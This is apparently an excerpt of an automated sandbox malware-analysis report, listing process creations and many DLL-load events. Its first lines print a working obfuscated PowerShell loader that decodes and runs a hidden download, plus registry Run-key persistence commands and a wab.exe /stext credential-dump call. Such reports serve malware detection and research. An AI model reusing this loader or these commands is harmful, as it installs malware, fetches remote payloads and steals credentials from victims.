              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeProcess created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
              Source: C:\Windows\SysWOW64\relog.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
